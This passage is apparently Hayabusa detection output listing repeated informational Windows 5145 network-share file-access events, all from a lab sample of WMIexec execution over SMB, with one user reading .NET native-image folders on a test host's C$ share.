10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 